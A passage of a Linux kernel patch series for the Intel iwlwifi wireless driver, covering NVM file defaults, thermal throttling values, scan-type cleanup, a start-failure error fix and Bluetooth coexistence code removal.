Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. 
* * Redistribution and use in source and binary forms, with or without @@ -190,6 +190,21 @@ static ssize_t iwl_dbgfs_pm_params_write(struct ieee80211_vif *vif, char *buf, return ret ?: count; } +static ssize_t iwl_dbgfs_tx_pwr_lmt_read(struct file *file, + char __user *user_buf, + size_t count, loff_t *ppos) +{ + struct ieee80211_vif *vif = file->private_data; + char buf[64]; + int bufsz = sizeof(buf); + int pos; + + pos = scnprintf(buf, bufsz, "bss limit = %d\n", + vif->bss_conf.txpower); + + return simple_read_from_buffer(user_buf, count, ppos, buf, pos); +} + static ssize_t iwl_dbgfs_pm_params_read(struct file *file, char __user *user_buf, size_t count, loff_t *ppos) @@ -607,6 +622,7 @@ static ssize_t iwl_dbgfs_rx_phyinfo_read(struct file *file, } while (0) MVM_DEBUGFS_READ_FILE_OPS(mac_params); +MVM_DEBUGFS_READ_FILE_OPS(tx_pwr_lmt); MVM_DEBUGFS_READ_WRITE_FILE_OPS(pm_params, 32); MVM_DEBUGFS_READ_WRITE_FILE_OPS(bf_params, 256); MVM_DEBUGFS_READ_WRITE_FILE_OPS(low_latency, 10); @@ -641,6 +657,7 @@ void iwl_mvm_vif_dbgfs_register(struct iwl_mvm *mvm, struct ieee80211_vif *vif) MVM_DEBUGFS_ADD_FILE_VIF(pm_params, mvmvif->dbgfs_dir, S_IWUSR | S_IRUSR); + MVM_DEBUGFS_ADD_FILE_VIF(tx_pwr_lmt, mvmvif->dbgfs_dir, S_IRUSR); MVM_DEBUGFS_ADD_FILE_VIF(mac_params, mvmvif->dbgfs_dir, S_IRUSR); MVM_DEBUGFS_ADD_FILE_VIF(low_latency, mvmvif->dbgfs_dir, S_IRUSR | S_IWUSR); From 4fb06283edb573bee139cf358173d3801520c692 Mon Sep 17 00:00:00 2001 From: Eran Harary Date: Sun, 19 Apr 2015 10:05:18 +0300 Subject: [PATCH 367/872] iwlwifi: 8000: fallback to default NVM file Set a default NVM in case the userspace specifies a file that doesn't match the hardware version. This allows not to change the boot scripts when someone replaces the device with a newer hardware step. Signed-off-by: Eran Harary Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-8000.c | 46 ++++++++++++------------- drivers/net/wireless/iwlwifi/mvm/nvm.c | 8 ++--- drivers/net/wireless/iwlwifi/mvm/ops.c | 17 ++++----- 3 files changed, 33 insertions(+), 38 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index f9770b7922fc..75881f94648c 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2014 Intel Mobile Communications GmbH + * Copyright(c) 2014 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2014 Intel Mobile Communications GmbH + * Copyright(c) 2014 - 2015 Intel Mobile Communications GmbH * All rights reserved. 
* * Redistribution and use in source and binary forms, with or without @@ -122,24 +122,26 @@ static const struct iwl_ht_params iwl8000_ht_params = { .ht40_bands = BIT(IEEE80211_BAND_2GHZ) | BIT(IEEE80211_BAND_5GHZ), }; -#define IWL_DEVICE_8000 \ - .ucode_api_max = IWL8000_UCODE_API_MAX, \ - .ucode_api_ok = IWL8000_UCODE_API_OK, \ - .ucode_api_min = IWL8000_UCODE_API_MIN, \ - .device_family = IWL_DEVICE_FAMILY_8000, \ - .max_inst_size = IWL60_RTC_INST_SIZE, \ - .max_data_size = IWL60_RTC_DATA_SIZE, \ - .base_params = &iwl8000_base_params, \ - .led_mode = IWL_LED_RF_STATE, \ - .nvm_hw_section_num = NVM_HW_SECTION_NUM_FAMILY_8000, \ - .d0i3 = true, \ - .non_shared_ant = ANT_A, \ - .dccm_offset = IWL8260_DCCM_OFFSET, \ - .dccm_len = IWL8260_DCCM_LEN, \ - .dccm2_offset = IWL8260_DCCM2_OFFSET, \ - .dccm2_len = IWL8260_DCCM2_LEN, \ - .smem_offset = IWL8260_SMEM_OFFSET, \ - .smem_len = IWL8260_SMEM_LEN +#define IWL_DEVICE_8000 \ + .ucode_api_max = IWL8000_UCODE_API_MAX, \ + .ucode_api_ok = IWL8000_UCODE_API_OK, \ + .ucode_api_min = IWL8000_UCODE_API_MIN, \ + .device_family = IWL_DEVICE_FAMILY_8000, \ + .max_inst_size = IWL60_RTC_INST_SIZE, \ + .max_data_size = IWL60_RTC_DATA_SIZE, \ + .base_params = &iwl8000_base_params, \ + .led_mode = IWL_LED_RF_STATE, \ + .nvm_hw_section_num = NVM_HW_SECTION_NUM_FAMILY_8000, \ + .d0i3 = true, \ + .non_shared_ant = ANT_A, \ + .dccm_offset = IWL8260_DCCM_OFFSET, \ + .dccm_len = IWL8260_DCCM_LEN, \ + .dccm2_offset = IWL8260_DCCM2_OFFSET, \ + .dccm2_len = IWL8260_DCCM2_LEN, \ + .smem_offset = IWL8260_SMEM_OFFSET, \ + .smem_len = IWL8260_SMEM_LEN, \ + .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, \ + .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C const struct iwl_cfg iwl8260_2n_cfg = { .name = "Intel(R) Dual Band Wireless N 8260", @@ -177,8 +179,6 @@ const struct iwl_cfg iwl8260_2ac_sdio_cfg = { .ht_params = &iwl8000_ht_params, .nvm_ver = IWL8000_NVM_VERSION, .nvm_calib_ver = IWL8000_TX_POWER_VERSION, - .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, - .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C, .max_rx_agg_size = MAX_RX_AGG_SIZE_8260_SDIO, .disable_dummy_notification = true, .max_ht_ampdu_exponent = MAX_HT_AMPDU_EXPONENT_8260_SDIO, @@ -192,8 +192,6 @@ const struct iwl_cfg iwl4165_2ac_sdio_cfg = { .ht_params = &iwl8000_ht_params, .nvm_ver = IWL8000_NVM_VERSION, .nvm_calib_ver = IWL8000_TX_POWER_VERSION, - .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, - .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C, .max_rx_agg_size = MAX_RX_AGG_SIZE_8260_SDIO, .bt_shared_single_ant = true, .disable_dummy_notification = true, diff --git a/drivers/net/wireless/iwlwifi/mvm/nvm.c b/drivers/net/wireless/iwlwifi/mvm/nvm.c index 87b2a30a2308..47014241bc3c 100644 --- a/drivers/net/wireless/iwlwifi/mvm/nvm.c +++ b/drivers/net/wireless/iwlwifi/mvm/nvm.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. 
* * Redistribution and use in source and binary forms, with or without @@ -583,9 +583,9 @@ int iwl_nvm_init(struct iwl_mvm *mvm, bool read_nvm_from_nic) kfree(nvm_buffer); } - /* load external NVM if configured */ + /* Only if PNVM selected in the mod param - load external NVM */ if (mvm->nvm_file_name) { - /* read External NVM file - take the default */ + /* read External NVM file from the mod param */ ret = iwl_mvm_read_external_nvm(mvm); if (ret) { /* choose the nvm_file name according to the diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 02028bcb3ff6..534a9fd8fcbd 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -32,7 +32,7 @@ * BSD LICENSE * * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -517,15 +517,12 @@ iwl_op_mode_mvm_start(struct iwl_trans *trans, const struct iwl_cfg *cfg, min_backoff = calc_min_backoff(trans, cfg); iwl_mvm_tt_initialize(mvm, min_backoff); - /* set the nvm_file_name according to priority */ - if (iwlwifi_mod_params.nvm_file) { + + if (iwlwifi_mod_params.nvm_file) mvm->nvm_file_name = iwlwifi_mod_params.nvm_file; - } else if (trans->cfg->device_family == IWL_DEVICE_FAMILY_8000) { - if (CSR_HW_REV_STEP(trans->hw_rev) == SILICON_B_STEP) - mvm->nvm_file_name = mvm->cfg->default_nvm_file_B_step; - else - mvm->nvm_file_name = mvm->cfg->default_nvm_file_C_step; - } + else + IWL_DEBUG_EEPROM(mvm->trans->dev, + "working without external nvm file\n"); if (WARN(cfg->no_power_up_nic_in_init && !mvm->nvm_file_name, "not allowing power-up and not having nvm_file\n")) From 8ce7db48645e6def197e038278b702381075a0de Mon Sep 17 00:00:00 2001 From: Ido Yariv Date: Mon, 4 May 2015 23:01:46 -0400 Subject: [PATCH 368/872] iwlwifi: update thermal throttling values for 8000 devices 8000 devices have different thermal throttling values from previous generations. 
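The new 8000-family table above pairs on-die temperatures with Tx backoff values. As a hedged sketch of how such a sorted table might be consulted (the lookup helper is illustrative, not the driver's thermal code; the values are taken from the patch):

#include <stdio.h>

struct tt_tx_backoff {
	int temperature;	/* degrees Celsius */
	int backoff;
};

static const struct tt_tx_backoff backoff_tbl[] = {
	{ .temperature = 110, .backoff = 200 },
	{ .temperature = 111, .backoff = 600 },
	{ .temperature = 112, .backoff = 1200 },
	{ .temperature = 113, .backoff = 2000 },
	{ .temperature = 114, .backoff = 4000 },
};

/* Pick the backoff of the highest entry whose threshold does not exceed 'temp'. */
static int tx_backoff_for_temp(int temp)
{
	size_t i;
	int backoff = 0;	/* no backoff below the first threshold */

	for (i = 0; i < sizeof(backoff_tbl) / sizeof(backoff_tbl[0]); i++)
		if (temp >= backoff_tbl[i].temperature)
			backoff = backoff_tbl[i].backoff;

	return backoff;
}

int main(void)
{
	printf("backoff at 112C: %d\n", tx_backoff_for_temp(112));
	return 0;
}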
Signed-off-by: Ido Yariv Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/iwl-8000.c | 24 +++++++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/iwl-8000.c b/drivers/net/wireless/iwlwifi/iwl-8000.c index 75881f94648c..5dca838a3e8b 100644 --- a/drivers/net/wireless/iwlwifi/iwl-8000.c +++ b/drivers/net/wireless/iwlwifi/iwl-8000.c @@ -122,6 +122,27 @@ static const struct iwl_ht_params iwl8000_ht_params = { .ht40_bands = BIT(IEEE80211_BAND_2GHZ) | BIT(IEEE80211_BAND_5GHZ), }; +static const struct iwl_tt_params iwl8000_tt_params = { + .ct_kill_entry = 115, + .ct_kill_exit = 93, + .ct_kill_duration = 5, + .dynamic_smps_entry = 111, + .dynamic_smps_exit = 107, + .tx_protection_entry = 112, + .tx_protection_exit = 105, + .tx_backoff = { + {.temperature = 110, .backoff = 200}, + {.temperature = 111, .backoff = 600}, + {.temperature = 112, .backoff = 1200}, + {.temperature = 113, .backoff = 2000}, + {.temperature = 114, .backoff = 4000}, + }, + .support_ct_kill = true, + .support_dynamic_smps = true, + .support_tx_protection = true, + .support_tx_backoff = true, +}; + #define IWL_DEVICE_8000 \ .ucode_api_max = IWL8000_UCODE_API_MAX, \ .ucode_api_ok = IWL8000_UCODE_API_OK, \ @@ -141,7 +162,8 @@ static const struct iwl_ht_params iwl8000_ht_params = { .smem_offset = IWL8260_SMEM_OFFSET, \ .smem_len = IWL8260_SMEM_LEN, \ .default_nvm_file_B_step = DEFAULT_NVM_FILE_FAMILY_8000B, \ - .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C + .default_nvm_file_C_step = DEFAULT_NVM_FILE_FAMILY_8000C, \ + .thermal_params = &iwl8000_tt_params const struct iwl_cfg iwl8260_2n_cfg = { .name = "Intel(R) Dual Band Wireless N 8260", From 3db93420f780d39dbef22ef6a5485aac009e02dc Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Wed, 6 May 2015 14:56:51 +0200 Subject: [PATCH 369/872] iwlwifi: mvm: advertise randomised netdetect MAC address According to the nl80211 documentation, we can neither advertise scheduled scan nor netdetect address randomisation. However, all the products that currently require this don't have a need for the full randomisation. Therefore, advertise the feature anyway which results in host- based randomisation, done whenever the system suspends. This is sufficient for the platforms currently requiring this feature. If we ever extend this in the future to do full randomisation in the firmware, then certainly this will still be sufficient for the current requirements, so it doesn't make a lot of sense to split the feature bits. 
Signed-off-by: Johannes Berg Reviewed-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/mac80211.c | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/iwlwifi/mvm/mac80211.c index 677143c79fa6..d13138e51686 100644 --- a/drivers/net/wireless/iwlwifi/mvm/mac80211.c +++ b/drivers/net/wireless/iwlwifi/mvm/mac80211.c @@ -452,7 +452,8 @@ int iwl_mvm_mac_setup_register(struct iwl_mvm *mvm) hw->flags |= IEEE80211_SINGLE_HW_SCAN_ON_ALL_BANDS; hw->wiphy->features |= NL80211_FEATURE_SCHED_SCAN_RANDOM_MAC_ADDR | - NL80211_FEATURE_SCAN_RANDOM_MAC_ADDR; + NL80211_FEATURE_SCAN_RANDOM_MAC_ADDR | + NL80211_FEATURE_ND_RANDOM_MAC_ADDR; hw->sta_data_size = sizeof(struct iwl_mvm_sta); hw->vif_data_size = sizeof(struct iwl_mvm_vif); From d643c432223270844c4fd8dcfaec85404d36bde7 Mon Sep 17 00:00:00 2001 From: Johannes Berg Date: Thu, 7 May 2015 14:47:50 +0200 Subject: [PATCH 370/872] iwlwifi: mvm: handle device start failure correctly If the device fails to start correctly prior to loading the regular runtime firmware (after having run the INIT firmware), treat that error correctly by actually checking the return value of _iwl_trans_start_hw() and stopping the device again before returning an error. Reported-by: Dan Carpenter Signed-off-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/fw.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/fw.c b/drivers/net/wireless/iwlwifi/mvm/fw.c index 0601445599f2..2f76fb23249a 100644 --- a/drivers/net/wireless/iwlwifi/mvm/fw.c +++ b/drivers/net/wireless/iwlwifi/mvm/fw.c @@ -662,9 +662,9 @@ int iwl_mvm_up(struct iwl_mvm *mvm) * device that are triggered by the INIT firwmare (MFUART). */ _iwl_trans_stop_device(mvm->trans, false); - _iwl_trans_start_hw(mvm->trans, false); + ret = _iwl_trans_start_hw(mvm->trans, false); if (ret) - return ret; + goto error; } if (iwlmvm_mod_params.init_dbg) From fa7878e76928a2100ca56295fc1ccfce063a842e Mon Sep 17 00:00:00 2001 From: Andrei Otcheretianski Date: Tue, 5 May 2015 09:28:16 +0300 Subject: [PATCH 371/872] iwlwifi: mvm: Configure agg. queue before assigning it to STA In order to imeplement the extended VI session feature for Miracast, the FW requires to detect the VI queue. The detection of the VI queue is done when it is assigned to a STA with ADD_STA command, so by this time the FW expects the queue to be already configured (mapped to VI AC and aggregation enabled). Previously, the queue configuration was done after STA modificaton which broke the extended VI session feature and resulted in higher latencies. Fix this by calling iwl_mvm_enable_agg_txq before station modification. Signed-off-by: Andrei Otcheretianski Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/sta.c | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/sta.c b/drivers/net/wireless/iwlwifi/mvm/sta.c index 1845b79487c8..d68dc697a4a0 100644 --- a/drivers/net/wireless/iwlwifi/mvm/sta.c +++ b/drivers/net/wireless/iwlwifi/mvm/sta.c @@ -5,8 +5,8 @@ * * GPL LICENSE SUMMARY * - * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2012 - 2015 Intel Corporation. All rights reserved. 
+ * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * * This program is free software; you can redistribute it and/or modify * it under the terms of version 2 of the GNU General Public License as @@ -31,8 +31,8 @@ * * BSD LICENSE * - * Copyright(c) 2012 - 2014 Intel Corporation. All rights reserved. - * Copyright(c) 2013 - 2014 Intel Mobile Communications GmbH + * Copyright(c) 2012 - 2015 Intel Corporation. All rights reserved. + * Copyright(c) 2013 - 2015 Intel Mobile Communications GmbH * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -1000,13 +1000,13 @@ int iwl_mvm_sta_tx_agg_oper(struct iwl_mvm *mvm, struct ieee80211_vif *vif, fifo = iwl_mvm_ac_to_tx_fifo[tid_to_mac80211_ac[tid]]; + iwl_mvm_enable_agg_txq(mvm, queue, fifo, mvmsta->sta_id, tid, + buf_size, ssn, wdg_timeout); + ret = iwl_mvm_sta_tx_agg(mvm, sta, tid, queue, true); if (ret) return -EIO; - iwl_mvm_enable_agg_txq(mvm, queue, fifo, mvmsta->sta_id, tid, - buf_size, ssn, wdg_timeout); - /* * Even though in theory the peer could have different * aggregation reorder buffer sizes for different sessions, From 9345c5958131078db7b51686505a37f7455f75c8 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Thu, 7 May 2015 10:10:57 +0300 Subject: [PATCH 372/872] iwlwifi: mvm: remove the UMAC specific scan types There is no need to have separate definitions for the UMAC scan types, since they are the same as the LMAC types. Remove UMAC scan types and use the generic ones instead. Signed-off-by: Luciano Coelho Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/scan.c | 47 +++++++++---------------- 1 file changed, 17 insertions(+), 30 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/scan.c b/drivers/net/wireless/iwlwifi/mvm/scan.c index e54432aad2e5..7777d56cbb60 100644 --- a/drivers/net/wireless/iwlwifi/mvm/scan.c +++ b/drivers/net/wireless/iwlwifi/mvm/scan.c @@ -101,13 +101,7 @@ struct iwl_mvm_scan_params { } schedule[2]; }; -enum iwl_umac_scan_uid_type { - IWL_UMAC_SCAN_UID_REG_SCAN = BIT(0), - IWL_UMAC_SCAN_UID_SCHED_SCAN = BIT(1), -}; - -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type, bool notify); +static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify); static u8 iwl_mvm_scan_rx_ant(struct iwl_mvm *mvm) { @@ -588,8 +582,7 @@ int iwl_mvm_scan_offload_stop(struct iwl_mvm *mvm, bool notify) lockdep_assert_held(&mvm->mutex); if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_UMAC_SCAN_UID_SCHED_SCAN, - notify); + return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_SCHED, notify); /* FIXME: For now we only check if no scan is set here, since * we only support LMAC in this flow and it doesn't support @@ -917,8 +910,7 @@ static int iwl_mvm_scan_lmac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, int iwl_mvm_cancel_scan(struct iwl_mvm *mvm) { if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) - return iwl_umac_scan_stop(mvm, IWL_UMAC_SCAN_UID_REG_SCAN, - true); + return iwl_umac_scan_stop(mvm, IWL_MVM_SCAN_REGULAR, true); if (!(mvm->scan_status & IWL_MVM_SCAN_REGULAR)) return 0; @@ -937,7 +929,7 @@ int iwl_mvm_cancel_scan(struct iwl_mvm *mvm) struct iwl_umac_scan_done { struct iwl_mvm *mvm; - enum iwl_umac_scan_uid_type type; + int type; }; static int rate_to_scan_rate_flag(unsigned int rate) @@ -1064,8 +1056,7 @@ static int iwl_mvm_find_free_scan_uid(struct iwl_mvm *mvm) return iwl_mvm_find_scan_uid(mvm, 0); } 
-static bool iwl_mvm_find_scan_type(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type) +static bool iwl_mvm_find_scan_type(struct iwl_mvm *mvm, int type) { int i; @@ -1076,8 +1067,7 @@ static bool iwl_mvm_find_scan_type(struct iwl_mvm *mvm, return false; } -static int iwl_mvm_find_first_scan(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type) +static int iwl_mvm_find_first_scan(struct iwl_mvm *mvm, int type) { int i; @@ -1088,8 +1078,7 @@ static int iwl_mvm_find_first_scan(struct iwl_mvm *mvm, return i; } -static u32 iwl_generate_scan_uid(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type) +static u32 iwl_generate_scan_uid(struct iwl_mvm *mvm, int type) { u32 uid; @@ -1201,9 +1190,9 @@ static int iwl_mvm_scan_umac(struct iwl_mvm *mvm, struct ieee80211_vif *vif, iwl_mvm_scan_umac_dwell(mvm, cmd, params); if (n_iterations == 1) - uid = iwl_generate_scan_uid(mvm, IWL_UMAC_SCAN_UID_REG_SCAN); + uid = iwl_generate_scan_uid(mvm, IWL_MVM_SCAN_REGULAR); else - uid = iwl_generate_scan_uid(mvm, IWL_UMAC_SCAN_UID_SCHED_SCAN); + uid = iwl_generate_scan_uid(mvm, IWL_MVM_SCAN_SCHED); mvm->scan_uid[uid_idx] = uid; cmd->uid = cpu_to_le32(uid); @@ -1478,7 +1467,7 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, struct iwl_rx_packet *pkt = rxb_addr(rxb); struct iwl_umac_scan_complete *notif = (void *)pkt->data; u32 uid = __le32_to_cpu(notif->uid); - bool sched = !!(uid & IWL_UMAC_SCAN_UID_SCHED_SCAN); + bool sched = !!(uid & IWL_MVM_SCAN_SCHED); int uid_idx = iwl_mvm_find_scan_uid(mvm, uid); /* @@ -1505,7 +1494,7 @@ int iwl_mvm_rx_umac_scan_complete_notif(struct iwl_mvm *mvm, notif->status == IWL_SCAN_OFFLOAD_ABORTED); iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); - } else if (!iwl_mvm_find_scan_type(mvm, IWL_UMAC_SCAN_UID_SCHED_SCAN)) { + } else if (!iwl_mvm_find_scan_type(mvm, IWL_MVM_SCAN_SCHED)) { ieee80211_sched_scan_stopped(mvm->hw); } else { IWL_DEBUG_SCAN(mvm, "Another sched scan is running\n"); @@ -1556,8 +1545,7 @@ static int iwl_umac_scan_abort_one(struct iwl_mvm *mvm, u32 uid) return iwl_mvm_send_cmd_pdu(mvm, SCAN_ABORT_UMAC, 0, sizeof(cmd), &cmd); } -static int iwl_umac_scan_stop(struct iwl_mvm *mvm, - enum iwl_umac_scan_uid_type type, bool notify) +static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int type, bool notify) { struct iwl_notification_wait wait_scan_done; static const u8 scan_done_notif[] = { SCAN_COMPLETE_UMAC, }; @@ -1579,7 +1567,7 @@ static int iwl_umac_scan_stop(struct iwl_mvm *mvm, int err; if (iwl_mvm_is_radio_killed(mvm) && - (type & IWL_UMAC_SCAN_UID_REG_SCAN)) { + (type & IWL_MVM_SCAN_REGULAR)) { ieee80211_scan_completed(mvm->hw, true); iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); break; @@ -1602,9 +1590,9 @@ static int iwl_umac_scan_stop(struct iwl_mvm *mvm, return ret; if (notify) { - if (type & IWL_UMAC_SCAN_UID_SCHED_SCAN) + if (type & IWL_MVM_SCAN_SCHED) ieee80211_sched_scan_stopped(mvm->hw); - if (type & IWL_UMAC_SCAN_UID_REG_SCAN) { + if (type & IWL_MVM_SCAN_REGULAR) { ieee80211_scan_completed(mvm->hw, true); iwl_mvm_unref(mvm, IWL_MVM_REF_SCAN); } @@ -1636,13 +1624,12 @@ void iwl_mvm_report_scan_aborted(struct iwl_mvm *mvm) if (mvm->fw->ucode_capa.capa[0] & IWL_UCODE_TLV_CAPA_UMAC_SCAN) { u32 uid, i; - uid = iwl_mvm_find_first_scan(mvm, IWL_UMAC_SCAN_UID_REG_SCAN); + uid = iwl_mvm_find_first_scan(mvm, IWL_MVM_SCAN_REGULAR); if (uid < mvm->max_scans) { ieee80211_scan_completed(mvm->hw, true); mvm->scan_uid[uid] = 0; } - uid = iwl_mvm_find_first_scan(mvm, - IWL_UMAC_SCAN_UID_SCHED_SCAN); + uid = iwl_mvm_find_first_scan(mvm, IWL_MVM_SCAN_SCHED); if 
(uid < mvm->max_scans && !mvm->restart_fw) { ieee80211_sched_scan_stopped(mvm->hw); mvm->scan_uid[uid] = 0; From c3b389d87a0f655d03f9ee00bdacee8e782fbda5 Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Sun, 10 May 2015 18:50:37 +0300 Subject: [PATCH 373/872] iwlwifi: mvm: BT Coex - remove useless code Since we don't need to configure the Ack / CTS kill mask anymore in the new API, we don't need to iterate all the interfaces upon rssi event on one of the interfaces. Remove that code. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/coex.c | 43 ------------------------- 1 file changed, 43 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/coex.c b/drivers/net/wireless/iwlwifi/mvm/coex.c index 13a0a03158de..03dab95ab051 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex.c @@ -770,49 +770,10 @@ int iwl_mvm_rx_bt_coex_notif(struct iwl_mvm *mvm, return 0; } -static void iwl_mvm_bt_rssi_iterator(void *_data, u8 *mac, - struct ieee80211_vif *vif) -{ - struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif); - struct iwl_bt_iterator_data *data = _data; - struct iwl_mvm *mvm = data->mvm; - - struct ieee80211_sta *sta; - struct iwl_mvm_sta *mvmsta; - - struct ieee80211_chanctx_conf *chanctx_conf; - - rcu_read_lock(); - chanctx_conf = rcu_dereference(vif->chanctx_conf); - /* If channel context is invalid or not on 2.4GHz - don't count it */ - if (!chanctx_conf || - chanctx_conf->def.chan->band != IEEE80211_BAND_2GHZ) { - rcu_read_unlock(); - return; - } - rcu_read_unlock(); - - if (vif->type != NL80211_IFTYPE_STATION || - mvmvif->ap_sta_id == IWL_MVM_STATION_COUNT) - return; - - sta = rcu_dereference_protected(mvm->fw_id_to_mac_id[mvmvif->ap_sta_id], - lockdep_is_held(&mvm->mutex)); - - /* This can happen if the station has been removed right now */ - if (IS_ERR_OR_NULL(sta)) - return; - - mvmsta = iwl_mvm_sta_from_mac80211(sta); -} - void iwl_mvm_bt_rssi_event(struct iwl_mvm *mvm, struct ieee80211_vif *vif, enum ieee80211_rssi_event_data rssi_event) { struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif); - struct iwl_bt_iterator_data data = { - .mvm = mvm, - }; int ret; if (!(mvm->fw->ucode_capa.api[0] & IWL_UCODE_TLV_API_BT_COEX_SPLIT)) { @@ -853,10 +814,6 @@ void iwl_mvm_bt_rssi_event(struct iwl_mvm *mvm, struct ieee80211_vif *vif, if (ret) IWL_ERR(mvm, "couldn't send BT_CONFIG HCMD upon RSSI event\n"); - - ieee80211_iterate_active_interfaces_atomic( - mvm->hw, IEEE80211_IFACE_ITER_NORMAL, - iwl_mvm_bt_rssi_iterator, &data); } #define LINK_QUAL_AGG_TIME_LIMIT_DEF (4000) From 741c4cfbf7705240e905cb4987bf2c23f25de17e Mon Sep 17 00:00:00 2001 From: Emmanuel Grumbach Date: Mon, 11 May 2015 09:05:25 +0300 Subject: [PATCH 374/872] iwlwifi: mvm: BT Coex - allocate a short command on the stack The BT_CONFIG command used to be very long, hence it was allocated on the heap in the previous API. In the new API, this command is much smaller, and can now safely be allocated on the stack. Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/coex.c | 36 ++++++++----------------- 1 file changed, 11 insertions(+), 25 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/coex.c b/drivers/net/wireless/iwlwifi/mvm/coex.c index 03dab95ab051..a9908865b660 100644 --- a/drivers/net/wireless/iwlwifi/mvm/coex.c +++ b/drivers/net/wireless/iwlwifi/mvm/coex.c @@ -6,7 +6,7 @@ * GPL LICENSE SUMMARY * * Copyright(c) 2013 - 2014 Intel Corporation. All rights reserved. 
